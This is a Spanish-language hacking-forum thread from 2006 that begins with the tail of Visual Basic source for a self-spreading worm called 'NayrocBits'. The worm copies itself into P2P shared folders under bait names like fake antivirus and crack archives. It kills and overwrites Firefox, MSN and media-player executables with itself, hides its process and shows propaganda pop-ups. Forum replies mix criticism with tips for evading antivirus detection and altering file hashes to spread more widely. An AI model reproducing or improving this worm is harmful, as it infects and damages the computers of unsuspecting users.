FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Listanegra-Kaspersky.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Norton Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\NOD32-Full.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\ZoneAlarm.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\ZoneAlarm-Professional.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Internet Security.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\PowerDVD.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Crack-NFS.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Crack.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\juego-3.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\xxx.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Area 51.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\Fotos Desnudas.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\SPRITER.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\LimeWire\Shared\K-32.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Listanegra-Kaspersky.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Norton Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\NOD32-Full.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\ZoneAlarm.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\ZoneAlarm-Professional.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Internet Security.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\PowerDVD.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Crack-NFS.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Crack.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\juego-3.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\xxx.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Area 51.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\Fotos Desnudas.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\SPRITER.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\K-32.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Overnet\incoming\gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Shareaza\Downloads\gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Swaptor\Download\gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\WinMX\My Shared Folder\gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Tesla\Files\gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\XoloX\Downloads\gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Rapigator\Share\gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\KMD\My Shared Folder\gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\BearShare\Shared\gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Direct Connect\Received Files\Gedzac.rar" 'Infectar mediante canales P2P NOHAYP2P: End Sub
Public Sub SecuestroCarpeta(DirPath As String) On Error GoTo error MkDir DirPath$ Exit Sub error: 'Crear carpetas de secuestro End Sub Sub Copiar() Do SecuestroCarpeta Environ("temp") & "\NDP20-KB922770-X86\NDP20-KB922770-X80" FileCopy App.EXEName + ".exe", Environ("Temp") & "\NDP20-KB922770-X86\NDP20-KB922770-X80\VGA.exe" SecuestroCarpeta Environ("tmp") & "\U\S\" FileCopy App.EXEName + ".exe", Environ("tmp") & "\U\S\IECACHE.exe" SecuestroCarpeta Environ("SYSTEMDRIVE") & "\Kw\" FileCopy App.EXEName + ".exe", Environ("systemdrive") & "\Kw\Dir.exe" SecuestroCarpeta Environ("SYS32") & "\Oriente-Eterno\" FileCopy App.EXEName + ".exe", Environ("SYS32") & "\Oriente-Eterno\Desinfectar.exe"
End Sub Sub Hijastros() 'Aqui hago lo mismo que secuestrar, pero esta vez lo hago con 'programas importantes. Matar ("msnmsgr.exe") Kill Environ("Programfiles") & "\MSN Messenger\msnmsgr.exe" FileCopy App.EXEName + ".exe", Environ("programfiles") & "\MSN Messenger\msnmsgr.exe"
Matar ("firefox.exe") Kill Environ("Programfiles") & "\Mozilla firefox\firefox.exe" FileCopy App.EXEName + ".exe", Environ("programfiles") & "\Mozilla firefox\firefox.exe"
Matar ("ypager.exe") Kill Environ("Programfiles") & "\Yahoo!\Messenger\ypager.exe" FileCopy App.EXEName + ".exe", Environ("programfiles") & "\Yahoo!\Messenger\ypager.exe"
Matar ("Realplay.exe") Kill Environ("Programfiles") & "\real\relaplayer\realplay.exe" FileCopy App.EXEName + ".exe", Environ("Programfiles") & "\real\relaplayer\realplay.exe"
Matar ("wmplayer") Kill Environ("Programfiles") & "\Windows media player\wmplayer.exe" FileCopy App.EXEName + ".exe", Environ("ProgrAmFiLeS") & "\Windows media player\Wmplayer.exe" 'No infectar el mplayer2 ni otro archivo, ya que seria fatal para el SO 'y ese no es el punto de este virus
End Sub
Private Function DownloadFile(ByVal sURL As String, ByVal sLocalFile As String) As Boolean DownloadFile = URLDownloadToFile(0, sURL, _ sLocalFile, 0, 0) = ERROR_SUCCESS End Function
Private Sub form_load() On Error Resume Next App.TaskVisible = False Label1.Caption = NumeroAleartorio(0, 100)
Alumbra OccidenteIntolerante Orientame InfectarP2P OrienteEterno EscribirHTA EliminarInicio Copiar Hijastros
Shell Environ("SYSTEMroot") & "\Index.hta"
'hdp End Sub Private Sub EscribirHTA() Do Open Environ("systemROOT") & "\Index.hta" For Output As #1 Print #1, "<HTML>" Print #1, "<HEAD>" Print #1, "<TITLE>Oriente Eterno</TITLE>" Print #1, "</HEAD>" Print #1, "<CENTER> En honor a las Almas caidas </CENTER>" Print #1, "<CENTER> En honor a los ignorados y resentidos </center> " Print #1, "<CENTER> En honor al pueblo Libanes </center> " Print #1, "<CENTER> En honor a los muertos del 11 de Abril - Venezuela </center> " Close #1
End Sub
Public Sub Matar(ByVal processName As String) On Error GoTo ErrHandler Dim oWMI Dim ret Dim sService Dim oWMIServices Dim oWMIService Dim oServices Dim oService Dim servicename Set oWMI = GetObject("winmgmts:") Set oServices = oWMI.InstancesOf("win32_process")
For Each oService In oServices servicename = LCase(Trim(CStr(oService.Name) & "")) If InStr(1, servicename, LCase(processName), vbTextCompare) > 0 Then ret = oService.Terminate End If Next Set oServices = Nothing Set oWMI = Nothing 'Matar procesos ErrHandler: Err.Clear End Sub Private Sub OrienteEterno() On Error Resume Next
Dim SantoOriente SantoOriente = Int(Rnd() * 11) Select Case SantoOriente Case 0 MsgBox "Dios bendiga las almas del pulgatorio", , "Amen" Case 1 MsgBox "¿Hasta cuando es hora que el Occidente Intolerante ignore la existencia de Dios y del mundo Espiritual y Abandone los placeres materiales?", , "Oriente Eterno" Case 2 MsgBox "Mientras tengamos el estamago lleno, no pensamos en los que tienen el estomago vacio", , "FOOD-FOR-LIFE" Case 3 MsgBox "Que el prayamama este con vosotros, benditos sean", , "Prayamama" Case 4 MsgBox "Es facil matar, Es dificil perderlo", , "No mates" Case 5 MsgBox "Ohh buen cristiano, Cristiano del alma, ¿Cuantos mandamientos ignorastes hoy?", , "Dios nos mira atentamente" Case 6 MsgBox "No es religiosidad la causa de nuestra existencia, Es el profundo amor que nos tiene Dios, y muchas veces lo ignoramos", , "Alto al suicidio" Case 7 MsgBox "Por las almas benditas de los inocentes libaneses, Que descansen en paz en el Oriente Eterno", , "Oriente Eterno" Case 8 MsgBox "Por la justicia en Venezuela, No olvidaremos el 11 de Abril", , "Justicia!" Case 9 MsgBox "Por ser negro o por tener un distinto credo, no quita que seamos obra e hijos del Dios ", , "No al racismo" Case 10 MsgBox "Es hora de la reflexion", , "Reflexiona" End Select
End Sub
Este codigo lo hago en nombre de todos los muertos y caidos, resentidos e ignorados... Hasta luego y espero que lo usen con fines beneficos ;).
Título: Re: NayrocBits - Malware
Publicado por: Zeroql en 29 Diciembre 2006, 21:19 pm
viejo lo felicvito por esa tan grandioso virus,esto si es un virus no como los que he visto en windows. bueno conozco algunos que kieren venganza con la sucursal de microsoft aqui en medellin- colombia, seria bueno que esto callera en sus manos. para los que odioa a microsoft o estan ofendidos con esta empresa. les deseo un muy dichozo feliz año, y al resto feliz año.
Título: Re: NayrocBits - Malware
Publicado por: Zeroql en 29 Diciembre 2006, 21:22 pm
viejo lo felicvito por esa tan grandioso virus,esto si es un virus no como los que he visto en windows. bueno conozco algunos que kieren venganza con la sucursal de microsoft aqui en medellin- colombia, seria bueno que esto callera en sus manos. para los que odioa a microsoft o estan ofendidos con esta empresa. les deseo un muy dichozo feliz año, y al resto feliz año.
Título: Re: NayrocBits - Malware
Publicado por: Sancho.Mazorka en 29 Diciembre 2006, 22:36 pm
Me encantaria insultarte! ;D otro mas que crea un virus para romper la makina de alguien [...] que ganas...? ensima mira todo lo que posteas, no sabes que la mayoria de la gente no lee todo xq le parece agobiante, ponlo de a poco y explicado si lo vas a hacer. Salu2 y espero que no te sirva :P
Título: Re: NayrocBits - Malware
Publicado por: Hans el Topo en 29 Diciembre 2006, 23:52 pm
ese code es viejisiiiisimo xD
lo he visto en otras partes para otros bichos...xD
Título: Re: NayrocBits - Malware
Publicado por: sp26 en 30 Diciembre 2006, 04:59 am
ese code es viejisiiiisimo xD
lo he visto en otras partes para otros bichos...xD
Viejisimo? si lo he creado yo al 100%... :S...
Título: Re: NayrocBits - Malware
Publicado por: sp26 en 30 Diciembre 2006, 05:07 am
Me encantaria insultarte! ;D otro mas que crea un virus para romper la makina de alguien [...] que ganas...? ensima mira todo lo que posteas, no sabes que la mayoria de la gente no lee todo xq le parece agobiante, ponlo de a poco y explicado si lo vas a hacer. Salu2 y espero que no te sirva :P
En realidad fue hecho con fines educativos y no pretendo joder a nadie, si analizas bien el worm lo unico que hace es copiarse en mil directorios y matar algunos procesos, no hace mas nada, no borra informacion util, no desconfigura la maquina ni nada... (Depnde como uses el AUTOEXEC xDDD!) Yo considero esto mas un Joke que un worm... pero en fin... son terminos y para mi worm es algo mas destructivo.. :P, este tan solo es el inicio de un worm... tan solo cumple funciones basicas... pero no llega al extremo de destruir una maquina...
Título: Re: NayrocBits - Malware
Publicado por: Sancho.Mazorka en 30 Diciembre 2006, 05:12 am
los troyanos, virus, worms, spyware, malware, dialers todos esos un usuario experto en PC y que esta en el tema es dificil que se le meta a la PC algo de esto, pero los otros que son unos NW solo usuarios que no saben una ***** o tiene un minimo conocimiento como mi vieja son los que sufren las consecuencias...! si no entendes mi punto de vista te doy otra explicacion. Sancho.Mazorka :P
Título: Re: NayrocBits - Malware
Publicado por: DrakoX en 30 Diciembre 2006, 05:17 am
los troyanos, virus, worms, spyware, malware, dialers todos esos un usuario experto en PC y que esta en el tema es dificil que se le meta a la PC algo de esto, pero los otros que son unos NW solo usuarios que no saben una ***** o tiene un minimo conocimiento como mi vieja son los que sufren las consecuencias...! si no entendes mi punto de vista te doy otra explicacion. esto totalmente de acuerdo con tigo, yo tengo amigos que conviven con virus, y sinceramente no c como hacen, para que les entre tanta mier** sin darse cuenta jaja, y me preguntan: a v que tas en toda la red no t entran virus?? y yo les digo que no, me parece que es algo dificil infectarse con un virus, sin darse cuenta de que un archvio puede ser sopechoso, x su nombre o x su tamaño, pero siempre hay gente que ni cuenta se da, y cae en la trampa xD salu2 y suerte
Título: Re: NayrocBits - Malware
Publicado por: sp26 en 30 Diciembre 2006, 05:18 am
los troyanos, virus, worms, spyware, malware, dialers todos esos un usuario experto en PC y que esta en el tema es dificil que se le meta a la PC algo de esto, pero los otros que son unos NW solo usuarios que no saben una ***** o tiene un minimo conocimiento como mi vieja son los que sufren las consecuencias...! si no entendes mi punto de vista te doy otra explicacion. Sancho.Mazorka :P Claro xDDD... Tampoco pienso que un experto en el tema caiga en un worm tan sencillo... Es solo para los Newbies, como dije anteriormente, es de fines educativos, pero un worm mas fuerte usaria mejores redes para propagarse... ;).
Título: Re: NayrocBits - Malware
Publicado por: Sancho.Mazorka en 30 Diciembre 2006, 05:30 am
A un NW dale un gusanito que solo cree una copia cada tanto y sera como el CHERNOBYL para nosotros con una makina sin antivirus :P ( bueno no tanto, pero se preocuparian) bueno dejemos de discutir y "chatear" aca xq soplo se va a enojar x agarrarlo de chat! para mi punto de vista esta mal, yo he hecho 1 troyano re groso que solo lo hice, pero nunca lo use, un programa para captar imagenes de la web cam y sacar fotos, autoclick, la famosa "calculadora" que todo el mundo a hecho, ahora estoy dedicandome a hacer algo con direct X, me hice un mouse con interfaz vb manejado con el puerto paralelo, un compilador de BAT (re pedorro), un server/cliente de intercambio de archivos y chat (casi = al Soul Seek) y mi proximo proyecto es (lo estoy haciendo) manejar el WMP con un control remoto, tmb con la ayuda del puerto paralelo. Pero bue si te gusta "Malwarear" (ya se no existe esa palabra) es tu gusto :P Sancho.Mazorka :P
Título: Re: NayrocBits - Malware
Publicado por: BenRu en 30 Diciembre 2006, 06:11 am
Bueno...antes de nada.. 1.El urlmon es mega-detectado xD...el av te lo pillara al rato de que lo lanzes xD... Hay apis que hacen esa labor mas eficiente. 2. El autoexec en xp lo tienes bastante chungo xD 3. Matar ("Explorer.exe") Shell "explorer.exe" 'Retornamos al EXPLORER para no levantar sospechas
Te crees que cuando a alguien se le quite la barra de inicio y fondo de escritorio, y aparezca de nuevo a los pocos segundos...no se va a dar cuenta?xD 4. Utilizas 4980818046 variables y no te has molestado en declarar ni una...ese es un habito muy malo de programacion. Solo he visto estas cosas en una leida rapida, no me he parado a ver el codigo, ni el proceso que usas (creo que esta muy desordenado),etc. De todas maneras, esto no sirve para nada absolutamente...solo para reventar el pc ajeno. pero un worm mas fuerte usaria mejores redes para propagarse... Para que hubiese sido bueno, deberias quitar tantas tonterias de msgbox, principalmente. Y recuerda que los malwares de calidad, son los que aprovechan fallos en el sistema. Tu solamente empleas muchos fragmentos de codigo que solo sirven para estropear el pc. Un saludo
Título: Re: NayrocBits - Malware
Publicado por: sp26 en 30 Diciembre 2006, 06:34 am
El punto de este malware es "Que se de cuenta que esta infectado", pues claro que mostrando MSGBOX con ese tipo de mensajes cualquier persona se sorprenderia y se asustaria, y empezara a correr los miles de antivirus que tiene, pero ninguno usa con eficazia...
Veras que no es nisiquiera un buen worm, es solo una burrada que se me ocurrio y ya...
El archivo AUTOEXEC (Por lo menos en mi XP) si sale... ;).
Título: Re: NayrocBits - Malware
Publicado por: skapunky en 30 Diciembre 2006, 12:51 pm
Yo del codigo no comento nada...solo como han dicho anteriormente que hay demasiadas variables y muchas linias de codigo que quiza se puedan arreglar con estructuras de repeticion para disminuirlas.
Sobre lo que queria hablar era sobre el secuestro de la pagina de inicio...eso de cambiar a la pagina de elhacker.net no se hasta que punto los moderadores/webmaster (gente que lleve elhacker.net) estara deacuerdo con que salga. Es una buena forma de hacer publi pero con malware :-\
Ya diran algo...en todo caso siempre se puede cambiar la URL y no pasa nada.
Saludos.
Título: Re: NayrocBits - Malware
Publicado por: [VolkS] en 30 Diciembre 2006, 21:43 pm
jajaj lo mejor es que usa Public Declare Function URLDownloadToFile Lib "urlmon.dll" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
para no ser detectado xDDDDDD! :P,lol el code esta bastante desordenado...
Título: Re: NayrocBits - Malware
Publicado por: <?BRoWLi?> en 30 Diciembre 2006, 22:34 pm
Lo knno me gusta del worm k pusiste al principio son las copias en Mis Docuentos... esa carpeta no es standard... mes Documents My Documents... no se si me explico... se podria aplicar un Or por si la PC fuese en otro lenguaje...
Título: Re: NayrocBits - Malware
Publicado por: sp26 en 30 Diciembre 2006, 23:23 pm
Lo knno me gusta del worm k pusiste al principio son las copias en Mis Docuentos... esa carpeta no es standard... mes Documents My Documents... no se si me explico... se podria aplicar un Or por si la PC fuese en otro lenguaje...
En caso de no existir, no se copia.... sobre poner la pagina "Elhacker.net", es solo una prueba... pero el verdadero worm lleva otra pagina, solo puse "Elhacker.net" para que no digan que hago spam.
Título: Re: NayrocBits - Malware
Publicado por: [VolkS] en 15 Enero 2007, 19:36 pm
cada copia q hagas del exe original tiene que cambiar el hash, porque los programas de p2p chekean el hash en la carpeta shared, y aunque pongas el mismo exe con 20 nombres distintos, solo compartiras 1, asique cambiales el hash agrandole un numero o una variable a cada copia xD.
|